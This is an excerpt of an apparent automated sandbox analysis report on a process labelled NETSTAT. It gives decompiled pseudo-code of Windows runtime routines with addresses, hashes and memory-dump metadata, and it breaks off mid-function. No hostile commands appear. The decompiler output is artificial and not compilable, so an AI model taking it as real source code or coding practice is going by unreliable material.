                                      0x02e9fc2d
                                      0x02e9fc30
                                      0x02edbf0f
                                      0x00000000
                                      0x02e9fc36
                                      0x02e9fc38
                                      0x02e9fc3b
                                      0x02e9fc41
                                      0x02edbf17
                                      0x02edbf19
                                      0x02edbf48
                                      0x02edbf4b
                                      0x00000000
                                      0x02edbf1b
                                      0x02edbf22
                                      0x02edbf24
                                      0x02edbf26
                                      0x00000000
                                      0x02edbf2c
                                      0x02edbf37
                                      0x02edbf39
                                      0x02edbf3b
                                      0x00000000
                                      0x02edbf41
                                      0x02edbf41
                                      0x02edbf41
                                      0x02edbf41
                                      0x02edbf45
                                      0x00000000
                                      0x02edbf45
                                      0x02edbf3b
                                      0x02edbf26
                                      0x00000000
                                      0x02e9fc47
                                      0x02e9fc47
                                      0x02e9fc49
                                      0x02e9fcb2
                                      0x02e9fcb4
                                      0x02e9fcb6
                                      0x02e9fcdc
                                      0x02e9fcdc
                                      0x00000000
                                      0x02e9fcb8
                                      0x02e9fcc3
                                      0x02e9fcc5
                                      0x02e9fcc7
                                      0x00000000
                                      0x02e9fcc9
                                      0x02e9fcc9
                                      0x02e9fccd
                                      0x00000000
                                      0x02e9fccd
                                      0x02e9fcc7
                                      0x00000000
                                      0x02e9fc4b
                                      0x02e9fc4b
                                      0x02e9fc4e
                                      0x02e9fc4e
                                      0x02e9fc51
                                      0x02e9fc51
                                      0x02e9fc54
                                      0x02e9fc5a
                                      0x02e9fc5c
                                      0x02e9fc5f
                                      0x02e9fc61
                                      0x02e9fc63
                                      0x02e9fc65
                                      0x02e9fc67
                                      0x02e9fc6e
                                      0x02e9fc72
                                      0x02e9fc72
                                      0x02e9fc72
                                      0x02e9fc72
                                      0x02e9fc67
                                      0x02e9fc61
                                      0x00000000
                                      0x02e9fc5a
                                      0x02e9fc49
                                      0x02e9fc41
                                      0x02e9fc30
                                      0x02e9fc27
                                      0x02e9fc03
                                      0x02e9fbcd
                                      0x02e9fbd3
                                      0x02e9fbd9
                                      0x02e9fbdc
                                      0x02e9fbde
                                      0x02e9fc99
                                      0x02e9fc9b
                                      0x02e9fc9d
                                      0x02e9fcd5
                                      0x02e9fcd5
                                      0x02e9fc89
                                      0x02e9fc89
                                      0x00000000
                                      0x02e9fc9f
                                      0x02e9fc9f
                                      0x02e9fca3
                                      0x00000000
                                      0x02e9fca3
                                      0x00000000
                                      0x02e9fbe4
                                      0x02e9fbe4
                                      0x02e9fbe4
                                      0x02e9fbe4
                                      0x02e9fbe9
                                      0x02e9fbf2
                                      0x00000000
                                      0x02e9fbf2
                                      0x02e9fbde
                                      0x02e9fbcb
                                      0x02e9fbab
                                      0x02e9fc8b
                                      0x02e9fc8b
                                      0x02e9fc8c
                                      0x02e9fb80
                                      0x02e9fb72
                                      0x02e9fb5e
                                      0x02e9fc8d
                                      0x02e9fc91
                                      0x02e9fadf
                                      0x02e9fadf
                                      0x02e9fae1
                                      0x02e9fae4
                                      0x02e9fae7
                                      0x02e9faec
                                      0x02e9faf8
                                      0x02e9fb00
                                      0x02e9fb07
                                      0x02e9fb0f
                                      0x02e9fb0f
                                      0x02e9fb07
                                      0x00000000
                                      0x02e9faf8
                                      0x02e9fadd

                                      Strings
                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02EDBE0F
                                      • (1?, xrefs: 02E9FAF1
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (1?$*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                      • API String ID: 0-3791283482
                                      • Opcode ID: 90b303fee7ec0ae3a0ef2b4c243a93f57829f0258d2f71e134afca0e1275061d
                                      • Instruction ID: b7afb4c9a9f0671a366746f7edeae854a077ee364f28bc44e748c6c2d2da9f8c
                                      • Opcode Fuzzy Hash: 90b303fee7ec0ae3a0ef2b4c243a93f57829f0258d2f71e134afca0e1275061d
                                      • Instruction Fuzzy Hash: 2BA1F331B806069BDB25DF68C4507EAB3A5AF4971CF05D56EE906DBA80EB30D842CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 60%
                                      			E02F2E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                      				signed int _v20;
                                      				char _v24;
                                      				signed int _v40;
                                      				char _v44;
                                      				intOrPtr _v48;
                                      				signed int _v52;
                                      				unsigned int _v56;
                                      				char _v60;
                                      				signed int _v64;
                                      				char _v68;
                                      				signed int _v72;
                                      				void* __ebx;
                                      				void* __edi;
                                      				char _t87;
                                      				signed int _t90;
                                      				signed int _t94;
                                      				signed int _t100;
                                      				intOrPtr* _t113;
                                      				signed int _t122;
                                      				void* _t132;
                                      				void* _t135;
                                      				signed int _t139;
                                      				signed int* _t141;
                                      				signed int _t146;
                                      				signed int _t147;
                                      				void* _t153;
                                      				signed int _t155;
                                      				signed int _t159;
                                      				char _t166;
                                      				void* _t172;
                                      				void* _t176;
                                      				signed int _t177;
                                      				intOrPtr* _t179;
                                      
                                      				_t179 = __ecx;
                                      				_v48 = __edx;
                                      				_v68 = 0;
                                      				_v72 = 0;
                                      				_push(__ecx[1]);
                                      				_push( *__ecx);
                                      				_push(0);
                                      				_t153 = 0x14;
                                      				_t135 = _t153;
                                      				_t132 = E02F2BBBB(_t135, _t153);
                                      				if(_t132 == 0) {
                                      					_t166 = _v68;
                                      					goto L43;
                                      				} else {
                                      					_t155 = 0;
                                      					_v52 = 0;
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					_v56 = __ecx[1];
                                      					if( *__ecx >> 8 < 2) {
                                      						_t155 = 1;
                                      						_v52 = 1;
                                      					}
                                      					_t139 = _a4;
                                      					_t87 = (_t155 << 0xc) + _t139;
                                      					_v60 = _t87;
                                      					if(_t87 < _t139) {
                                      						L11:
                                      						_t166 = _v68;
                                      						L12:
                                      						if(_t132 != 0) {
                                      							E02F2BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                      						}
                                      						L43:
                                      						if(_v72 != 0) {
                                      							_push( *((intOrPtr*)(_t179 + 4)));
                                      							_push( *_t179);
                                      							_push(0x8000);
                                      							E02F2AFDE( &_v72,  &_v60);
                                      						}
                                      						L46:
                                      						return _t166;
                                      					}
                                      					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                      					asm("sbb edi, edi");
                                      					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                      					if(_t90 != 0) {
                                      						_push(0);
                                      						_push(0x14);
                                      						_push( &_v44);
                                      						_push(3);
                                      						_push(_t179);
                                      						_push(0xffffffff);
                                      						if(E02EA9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                      							_push(_t139);
                                      							E02F2A80D(_t179, 1, _v40, 0);
                                      							_t172 = 4;
                                      						}
                                      					}
                                      					_t141 =  &_v72;
                                      					if(E02F2A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                      						_v64 = _a4;
                                      						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                      						asm("sbb edi, edi");
                                      						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                      						if(_t94 != 0) {
                                      							_push(0);
                                      							_push(0x14);
                                      							_push( &_v24);
                                      							_push(3);
                                      							_push(_t179);
                                      							_push(0xffffffff);
                                      							if(E02EA9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                      								_push(_t141);
                                      								E02F2A80D(_t179, 1, _v20, 0);
                                      								_t176 = 4;
                                      							}
                                      						}
                                      						if(E02F2A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                      							goto L11;
                                      						} else {
                                      							_t177 = _v64;
                                      							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                      							_t100 = _v52 + _v52;
                                      							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                      							 *(_t132 + 0x10) = _t146;
                                      							asm("bsf eax, [esp+0x18]");
                                      							_v52 = _t100;
                                      							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                      							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                      							_t47 =  &_a8;
                                      							 *_t47 = _a8 & 0x00000001;
                                      							if( *_t47 == 0) {
                                      								E02E82280(_t179 + 0x30, _t179 + 0x30);
                                      							}
                                      							_t147 =  *(_t179 + 0x34);
                                      							_t159 =  *(_t179 + 0x38) & 1;
                                      							_v68 = 0;
                                      							if(_t147 == 0) {
                                      								L35:
                                      								E02E7B090(_t179 + 0x34, _t147, _v68, _t132);
                                      								if(_a8 == 0) {
                                      									E02E7FFB0(_t132, _t177, _t179 + 0x30);
                                      								}
                                      								asm("lock xadd [eax], ecx");
                                      								asm("lock xadd [eax], edx");
                                      								_t132 = 0;
                                      								_v72 = _v72 & 0;
                                      								_v68 = _v72;
                                      								if(E02E87D50() == 0) {
                                      									_t113 = 0x7ffe0388;
                                      								} else {
                                      									_t177 = _v64;
                                      									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                      								}
                                      								if( *_t113 == _t132) {
                                      									_t166 = _v68;
                                      									goto L46;
                                      								} else {
                                      									_t166 = _v68;
                                      									E02F1FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                      									goto L12;
                                      								}
                                      							} else {
                                      								L23:
                                      								while(1) {
                                      									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                      										_t122 =  *_t147;
                                      										if(_t159 == 0) {
                                      											L32:
                                      											if(_t122 == 0) {
                                      												L34:
                                      												_v68 = 0;
                                      												goto L35;
                                      											}
                                      											L33:
                                      											_t147 = _t122;
                                      											continue;
                                      										}
                                      										if(_t122 == 0) {
                                      											goto L34;
                                      										}
                                      										_t122 = _t122 ^ _t147;
                                      										goto L32;
                                      									}
                                      									_t122 =  *(_t147 + 4);
                                      									if(_t159 == 0) {
                                      										L27:
                                      										if(_t122 != 0) {
                                      											goto L33;
                                      										}
                                      										L28:
                                      										_v68 = 1;
                                      										goto L35;
                                      									}
                                      									if(_t122 == 0) {
                                      										goto L28;
                                      									}
                                      									_t122 = _t122 ^ _t147;
                                      									goto L27;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					_v72 = _v72 & 0x00000000;
                                      					goto L11;
                                      				}
                                      			}





































                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `$`
                                      • API String ID: 0-197956300
                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                      • Instruction ID: 04f810e1ea6396a251618ea300985d5fe787de79d266708dfefd4eb4164c62ef
                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                      • Instruction Fuzzy Hash: 009191316043559FE724CE25C841B57B7E6BF85754F24892DFAA9CB280E774E808CF52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 77%
                                      			E02EE51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed short* _t63;
                                      				signed int _t64;
                                      				signed int _t65;
                                      				signed int _t67;
                                      				intOrPtr _t74;
                                      				intOrPtr _t84;
                                      				intOrPtr _t88;
                                      				intOrPtr _t94;
                                      				void* _t100;
                                      				void* _t103;
                                      				intOrPtr _t105;
                                      				signed int _t106;
                                      				short* _t108;
                                      				signed int _t110;
                                      				signed int _t113;
                                      				signed int* _t115;
                                      				signed short* _t117;
                                      				void* _t118;
                                      				void* _t119;
                                      
                                      				_push(0x80);
                                      				_push(0x2f405f0);
                                      				E02EBD0E8(__ebx, __edi, __esi);
                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                      				_t115 =  *(_t118 + 0xc);
                                      				 *(_t118 - 0x7c) = _t115;
                                      				 *((char*)(_t118 - 0x65)) = 0;
                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                      				_t113 = 0;
                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                      				_t100 = __ecx;
                                      				if(_t100 == 0) {
                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                      					E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                      					 *((char*)(_t118 - 0x65)) = 1;
                                      					_t63 =  *(_t118 - 0x90);
                                      					_t101 = _t63[2];
                                      					_t64 =  *_t63 & 0x0000ffff;
                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                      					L20:
                                      					_t65 = _t64 >> 1;
                                      					L21:
                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                      					if(_t108 == 0) {
                                      						L27:
                                      						 *_t115 = _t65 + 1;
                                      						_t67 = 0xc0000023;
                                      						L28:
                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                      						L29:
                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                      						E02EE53CA(0);
                                      						return E02EBD130(0, _t113, _t115);
                                      					}
                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                      							 *_t108 = 0;
                                      						}
                                      						goto L27;
                                      					}
                                      					 *_t115 = _t65;
                                      					_t115 = _t65 + _t65;
                                      					E02EAF3E0(_t108, _t101, _t115);
                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                      					_t67 = 0;
                                      					goto L28;
                                      				}
                                      				_t103 = _t100 - 1;
                                      				if(_t103 == 0) {
                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                      					_t74 = E02E83690(1, _t117, 0x2e41810, _t118 - 0x74);
                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                      					_t101 = _t117[2];
                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                      					if(_t74 < 0) {
                                      						_t64 =  *_t117 & 0x0000ffff;
                                      						_t115 =  *(_t118 - 0x7c);
                                      						goto L20;
                                      					}
                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                      					_t115 =  *(_t118 - 0x7c);
                                      					goto L21;
                                      				}
                                      				if(_t103 == 1) {
                                      					_t105 = 4;
                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                      					_push(_t118 - 0x70);
                                      					_push(0);
                                      					_push(0);
                                      					_push(_t105);
                                      					_push(_t118 - 0x78);
                                      					_push(0x6b);
                                      					 *((intOrPtr*)(_t118 - 0x64)) = E02EAAA90();
                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                      					_t113 = L02E84620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                      					if(_t113 != 0) {
                                      						_push(_t118 - 0x70);
                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                      						_push(_t113);
                                      						_push(4);
                                      						_push(_t118 - 0x78);
                                      						_push(0x6b);
                                      						_t84 = E02EAAA90();
                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                      						if(_t84 < 0) {
                                      							goto L29;
                                      						}
                                      						_t110 = 0;
                                      						_t106 = 0;
                                      						while(1) {
                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                      							 *(_t118 - 0x88) = _t106;
                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                      								break;
                                      							}
                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                      							_t106 = _t106 + 1;
                                      						}
                                      						_t88 = E02EE500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                      						_t119 = _t119 + 0x1c;
                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                      						if(_t88 < 0) {
                                      							goto L29;
                                      						}
                                      						_t101 = _t118 - 0x3c;
                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                      						goto L21;
                                      					}
                                      					_t67 = 0xc0000017;
                                      					goto L28;
                                      				}
                                      				_push(0);
                                      				_push(0x20);
                                      				_push(_t118 - 0x60);
                                      				_push(0x5a);
                                      				_t94 = E02EA9860();
                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                      				if(_t94 < 0) {
                                      					goto L29;
                                      				}
                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                      					_t101 = L"Legacy";
                                      					_push(6);
                                      				} else {
                                      					_t101 = L"UEFI";
                                      					_push(4);
                                      				}
                                      				_pop(_t65);
                                      				goto L21;
                                      			}























                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: Legacy$UEFI
                                      • API String ID: 2994545307-634100481
                                      • Opcode ID: 8ae854905c4b9795fd7b414747263051f6aaadf0743bb94f05248e14e6f2bc60
                                      • Instruction ID: b0183944896b6e716a67f7cab0b8dde5ea8df494db200aec2859c55364e15e89
                                      • Opcode Fuzzy Hash: 8ae854905c4b9795fd7b414747263051f6aaadf0743bb94f05248e14e6f2bc60
                                      • Instruction Fuzzy Hash: 48516F71A806089FDF24DFA8D850BADB7F9FF48708F54946EE54AEB251DB719900CB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E02E6B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                      				signed int _t65;
                                      				signed short _t69;
                                      				intOrPtr _t70;
                                      				signed short _t85;
                                      				void* _t86;
                                      				signed short _t89;
                                      				signed short _t91;
                                      				intOrPtr _t92;
                                      				intOrPtr _t97;
                                      				intOrPtr* _t98;
                                      				signed short _t99;
                                      				signed short _t101;
                                      				void* _t102;
                                      				char* _t103;
                                      				signed short _t104;
                                      				intOrPtr* _t110;
                                      				void* _t111;
                                      				void* _t114;
                                      				intOrPtr* _t115;
                                      
                                      				_t109 = __esi;
                                      				_t108 = __edi;
                                      				_t106 = __edx;
                                      				_t95 = __ebx;
                                      				_push(0x90);
                                      				_push(0x2f3f7a8);
                                      				E02EBD0E8(__ebx, __edi, __esi);
                                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                      				if(__edx == 0xffffffff) {
                                      					L6:
                                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                      					__eflags = _t65 & 0x00000002;
                                      					if((_t65 & 0x00000002) != 0) {
                                      						L3:
                                      						L4:
                                      						return E02EBD130(_t95, _t108, _t109);
                                      					}
                                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                      					_t108 = 0;
                                      					_t109 = 0;
                                      					_t95 = 0;
                                      					__eflags = 0;
                                      					while(1) {
                                      						__eflags = _t95 - 0x200;
                                      						if(_t95 >= 0x200) {
                                      							break;
                                      						}
                                      						E02EAD000(0x80);
                                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                      						_t108 = _t115;
                                      						_t95 = _t95 - 0xffffff80;
                                      						_t17 = _t114 - 4;
                                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                      						__eflags =  *_t17;
                                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                      						_t102 = _t110 + 1;
                                      						do {
                                      							_t85 =  *_t110;
                                      							_t110 = _t110 + 1;
                                      							__eflags = _t85;
                                      						} while (_t85 != 0);
                                      						_t111 = _t110 - _t102;
                                      						_t21 = _t95 - 1; // -129
                                      						_t86 = _t21;
                                      						__eflags = _t111 - _t86;
                                      						if(_t111 > _t86) {
                                      							_t111 = _t86;
                                      						}
                                      						E02EAF3E0(_t108, _t106, _t111);
                                      						_t115 = _t115 + 0xc;
                                      						_t103 = _t111 + _t108;
                                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                      						_t89 = _t95 - _t111;
                                      						__eflags = _t89;
                                      						_push(0);
                                      						if(_t89 == 0) {
                                      							L15:
                                      							_t109 = 0xc000000d;
                                      							goto L16;
                                      						} else {
                                      							__eflags = _t89 - 0x7fffffff;
                                      							if(_t89 <= 0x7fffffff) {
                                      								L16:
                                      								 *(_t114 - 0x94) = _t109;
                                      								__eflags = _t109;
                                      								if(_t109 < 0) {
                                      									__eflags = _t89;
                                      									if(_t89 != 0) {
                                      										 *_t103 = 0;
                                      									}
                                      									L26:
                                      									 *(_t114 - 0xa0) = _t109;
                                      									 *(_t114 - 4) = 0xfffffffe;
                                      									__eflags = _t109;
                                      									if(_t109 >= 0) {
                                      										L31:
                                      										_t98 = _t108;
                                      										_t39 = _t98 + 1; // 0x1
                                      										_t106 = _t39;
                                      										do {
                                      											_t69 =  *_t98;
                                      											_t98 = _t98 + 1;
                                      											__eflags = _t69;
                                      										} while (_t69 != 0);
                                      										_t99 = _t98 - _t106;
                                      										__eflags = _t99;
                                      										L34:
                                      										_t70 =  *[fs:0x30];
                                      										__eflags =  *((char*)(_t70 + 2));
                                      										if( *((char*)(_t70 + 2)) != 0) {
                                      											L40:
                                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                      											 *(_t114 - 4) = 1;
                                      											_push(_t114 - 0x74);
                                      											L02EBDEF0(_t99, _t106);
                                      											 *(_t114 - 4) = 0xfffffffe;
                                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                      											goto L3;
                                      										}
                                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                      											goto L40;
                                      										}
                                      										_push( *((intOrPtr*)(_t114 + 8)));
                                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                      										_push(_t99 & 0x0000ffff);
                                      										_push(_t108);
                                      										_push(1);
                                      										_t101 = E02EAB280();
                                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                      										if( *((char*)(_t114 + 0x14)) == 1) {
                                      											__eflags = _t101 - 0x80000003;
                                      											if(_t101 == 0x80000003) {
                                      												E02EAB7E0(1);
                                      												_t101 = 0;
                                      												__eflags = 0;
                                      											}
                                      										}
                                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                      										goto L4;
                                      									}
                                      									__eflags = _t109 - 0x80000005;
                                      									if(_t109 == 0x80000005) {
                                      										continue;
                                      									}
                                      									break;
                                      								}
                                      								 *(_t114 - 0x90) = 0;
                                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                      								_t91 = E02EAE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                      								_t115 = _t115 + 0x10;
                                      								_t104 = _t91;
                                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                      								__eflags = _t104;
                                      								if(_t104 < 0) {
                                      									L21:
                                      									_t109 = 0x80000005;
                                      									 *(_t114 - 0x90) = 0x80000005;
                                      									L22:
                                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                      									L23:
                                      									 *(_t114 - 0x94) = _t109;
                                      									goto L26;
                                      								}
                                      								__eflags = _t104 - _t92;
                                      								if(__eflags > 0) {
                                      									goto L21;
                                      								}
                                      								if(__eflags == 0) {
                                      									goto L22;
                                      								}
                                      								goto L23;
                                      							}
                                      							goto L15;
                                      						}
                                      					}
                                      					__eflags = _t109;
                                      					if(_t109 >= 0) {
                                      						goto L31;
                                      					}
                                      					__eflags = _t109 - 0x80000005;
                                      					if(_t109 != 0x80000005) {
                                      						goto L31;
                                      					}
                                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                      					_t38 = _t95 - 1; // -129
                                      					_t99 = _t38;
                                      					goto L34;
                                      				}
                                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                      					__eflags = __edx - 0x65;
                                      					if(__edx != 0x65) {
                                      						goto L2;
                                      					}
                                      					goto L6;
                                      				}
                                      				L2:
                                      				_push( *((intOrPtr*)(_t114 + 8)));
                                      				_push(_t106);
                                      				if(E02EAA890() != 0) {
                                      					goto L6;
                                      				}
                                      				goto L3;
                                      			}























                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: _vswprintf_s
                                      • String ID:
                                      • API String ID: 677850445-0
                                      • Opcode ID: 9094e8801da7411edff6e57791cd71051b296fb836564f02112ee4b9475a3cc0
                                      • Instruction ID: 73d0d6b910aec0423a827b660b30d26e5386a4cf824d15d8f63913eda41e7c82
                                      • Opcode Fuzzy Hash: 9094e8801da7411edff6e57791cd71051b296fb836564f02112ee4b9475a3cc0
                                      • Instruction Fuzzy Hash: 0851D771D442A98ADF35CFA4C9547BDBBB1BF04718F2091ADE8599B281D7704942CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 76%
                                      			E02E8B944(signed int* __ecx, char __edx) {
                                      				signed int _v8;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				signed int _v32;
                                      				char _v36;
                                      				signed int _v40;
                                      				intOrPtr _v44;
                                      				signed int* _v48;
                                      				signed int _v52;
                                      				signed int _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				char _v77;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr* _t65;
                                      				intOrPtr _t67;
                                      				intOrPtr _t68;
                                      				char* _t73;
                                      				intOrPtr _t77;
                                      				intOrPtr _t78;
                                      				signed int _t82;
                                      				intOrPtr _t83;
                                      				void* _t87;
                                      				char _t88;
                                      				intOrPtr* _t89;
                                      				intOrPtr _t91;
                                      				void* _t97;
                                      				intOrPtr _t100;
                                      				void* _t102;
                                      				void* _t107;
                                      				signed int _t108;
                                      				intOrPtr* _t112;
                                      				void* _t113;
                                      				intOrPtr* _t114;
                                      				intOrPtr _t115;
                                      				intOrPtr _t116;
                                      				intOrPtr _t117;
                                      				signed int _t118;
                                      				void* _t130;
                                      
                                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                      				_v8 =  *0x2f5d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                      				_t112 = __ecx;
                                      				_v77 = __edx;
                                      				_v48 = __ecx;
                                      				_v28 = 0;
                                      				_t5 = _t112 + 0xc; // 0x575651ff
                                      				_t105 =  *_t5;
                                      				_v20 = 0;
                                      				_v16 = 0;
                                      				if(_t105 == 0) {
                                      					_t50 = _t112 + 4; // 0x5de58b5b
                                      					_t60 =  *__ecx |  *_t50;
